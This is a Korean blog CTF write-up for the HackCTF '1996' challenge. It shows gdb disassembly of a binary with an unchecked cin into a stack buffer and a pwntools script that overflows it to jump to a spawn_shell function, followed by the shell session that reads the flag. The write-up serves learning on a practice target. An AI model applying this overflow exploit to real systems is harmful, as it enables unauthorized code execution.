본문 바로가기
CTF_Write_UP/HackCTF

[HackCTF] 1996

PowerCo3e_LCH 2019. 9. 22. 15:56

시작

안녕하세요 :D

200점짜리 문제들이 더 쉬운 건 기분 탓이겠죠..?

이번 문제도 환경변수를 받아오는 컨셉을 잡고 있었는데 단순 BOF가 터지네요 ㅋㅋㅋ

시작해보죠!!

Write UP

root@goorm:/workspace/LCH_Server/HackCTF/14.1996# ./1996
Which environment variable do you want to read? USER
USER=root

환경변수를 받아옵니다. getenv() 같은 함수가 있겠네요.

gdb-peda$ pd main
Dump of assembler code for function main:
   0x00000000004008cd <+0>:     push   rbp
   0x00000000004008ce <+1>:     mov    rbp,rsp
   0x00000000004008d1 <+4>:     push   rbx
   0x00000000004008d2 <+5>:     sub    rsp,0x408
   0x00000000004008d9 <+12>:    lea    rsi,[rip+0x188]        # 0x400a68
   0x00000000004008e0 <+19>:    lea    rdi,[rip+0x200779]        # 0x601060 <std::cout@@GLIBCXX_3.4>
   0x00000000004008e7 <+26>:    call   0x400760 <std::basic_ostream<char, std::char_traits >& std::operator<< <std::char_traits >(std::basic_ostream<char, std::char_traits<
char> >&, char const*)@plt>
   0x00000000004008ec <+31>:    lea    rax,[rbp-0x410]
   0x00000000004008f3 <+38>:    mov    rsi,rax
   0x00000000004008f6 <+41>:    lea    rdi,[rip+0x200883]        # 0x601180 <std::cin@@GLIBCXX_3.4>
   0x00000000004008fd <+48>:    call   0x400740 <std::basic_istream<char, std::char_traits >& std::operator>><char, std::char_traits >(std::basic_istream<char, std::char_tr
aits >&, char*)@plt>
   0x0000000000400902 <+53>:    lea    rax,[rbp-0x410]
   0x0000000000400909 <+60>:    mov    rsi,rax
   0x000000000040090c <+63>:    lea    rdi,[rip+0x20074d]        # 0x601060 <std::cout@@GLIBCXX_3.4>
   0x0000000000400913 <+70>:    call   0x400760 <std::basic_ostream<char, std::char_traits >& std::operator<< <std::char_traits >(std::basic_ostream<char, std::char_traits<
char> >&, char const*)@plt>
   0x0000000000400918 <+75>:    lea    rsi,[rip+0x17a]        # 0x400a99
   0x000000000040091f <+82>:    mov    rdi,rax
   0x0000000000400922 <+85>:    call   0x400760 <std::basic_ostream<char, std::char_traits >& std::operator<< <std::char_traits >(std::basic_ostream<char, std::char_traits<
char> >&, char const*)@plt>
   0x0000000000400927 <+90>:    mov    rbx,rax
   0x000000000040092a <+93>:    lea    rax,[rbp-0x410]
   0x0000000000400931 <+100>:   mov    rdi,rax
   0x0000000000400934 <+103>:   call   0x400780 <getenv@plt>
   0x0000000000400939 <+108>:   mov    rsi,rax
   0x000000000040093c <+111>:   mov    rdi,rbx
   0x000000000040093f <+114>:   call   0x400760 <std::basic_ostream<char, std::char_traits >& std::operator<< <std::char_traits >(std::basic_ostream<char, std::char_traits<
char> >&, char const*)@plt>
   0x0000000000400944 <+119>:   mov    rdx,rax
   0x0000000000400947 <+122>:   mov    rax,QWORD PTR [rip+0x200692]        # 0x600fe0
   0x000000000040094e <+129>:   mov    rsi,rax
   0x0000000000400951 <+132>:   mov    rdi,rdx
   0x0000000000400954 <+135>:   call   0x400770 <std::ostream::operator<<(std::ostream& (*)(std::ostream&))@plt>
   0x0000000000400959 <+140>:   mov    eax,0x0
   0x000000000040095e <+145>:   add    rsp,0x408
   0x0000000000400965 <+152>:   pop    rbx
   0x0000000000400966 <+153>:   pop    rbp
   0x0000000000400967 <+154>:   ret
End of assembler dump.

맞습니다.

그런데 cin >> $rbp-0x410으로 추정되는 main+31 부분에 길이를 검증하는 코드가 없어요.

A * 0x410 + 8 + RET으로 BOF가 터집니다.

gdb-peda$ pd spawn_shell
Dump of assembler code for function _Z11spawn_shellv:
   0x0000000000400897 <+0>:     push   rbp
   0x0000000000400898 <+1>:     mov    rbp,rsp
   0x000000000040089b <+4>:     sub    rsp,0x10
   0x000000000040089f <+8>:     lea    rax,[rip+0x1b3]        # 0x400a59
   0x00000000004008a6 <+15>:    mov    QWORD PTR [rbp-0x10],rax
   0x00000000004008aa <+19>:    mov    QWORD PTR [rbp-0x8],0x0
   0x00000000004008b2 <+27>:    lea    rax,[rbp-0x10]
   0x00000000004008b6 <+31>:    mov    edx,0x0
   0x00000000004008bb <+36>:    mov    rsi,rax
   0x00000000004008be <+39>:    lea    rdi,[rip+0x194]        # 0x400a59
   0x00000000004008c5 <+46>:    call   0x4007a0 <execve@plt>
   0x00000000004008ca <+51>:    nop
   0x00000000004008cb <+52>:    leave
   0x00000000004008cc <+53>:    ret
End of assembler dump.

쉘을 떨어뜨리는 친구도 친절하게 구현을 해주었어요.

코드입니다.

from pwn import *

#p = process("./1996")
p = remote("ctf.j0n9hyun.xyz", 3013)

payload = ""
shell = 0x400897

p.recvuntil("read? ")

payload += "A" * 1048
payload += p64(shell)

p.sendline(payload)

p.interactive()

[+] Opening connection to ctf.j0n9hyun.xyz on port 3013: Done
[*] Switching to interactive mode
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x9@=$
$ ls
flag
main
$ cat flag
///flag!!

Exploit!!

마무리

어.. 당황스럽네요.. 넘어가겠습니다 ㅋㅋㅋㅋ

감사합니다 :D

'CTF_Write_UP > HackCTF' 카테고리의 다른 글

[HackCTF] RTL_Core  (0) 2019.09.22
[HackCTF] Random Key  (0) 2019.09.22
[HackCTF] Poet  (0) 2019.09.22
[HackCTF] RTL_World  (0) 2019.09.19
[HackCTF] Yes or no  (0) 2019.09.19

'CTF_Write_UP/HackCTF' Related Articles

티스토리툴바